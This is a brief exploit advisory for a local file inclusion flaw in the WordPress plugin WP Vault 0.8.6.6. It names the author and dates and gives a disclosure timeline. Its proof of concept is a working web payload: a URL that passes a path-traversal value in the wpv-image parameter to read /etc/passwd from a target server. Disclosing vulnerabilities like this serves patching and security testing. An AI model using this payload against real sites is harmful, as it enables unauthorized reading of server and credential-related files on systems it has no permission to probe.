WordPress WP Vault plugin version 0.8.6.6 suffers from a local file inclusion vulnerability.
d375c2b314f91dbe80878224a3a9d227
# Exploit Title: WP Vault 0.8.6.6 a Plugin WordPress a Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04
1 - Description:
$_GET[awpv-imagea] is not escaped in include file.
http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/
2 - Proof of Concept:
http://Target/?wpv-image=[LFI]
http://Target/?wpv-image=../../../../../../../../../../etc/passwd
3 - Timeline:
12/11/2016 - Discovered
12/11/2016 - vendor not found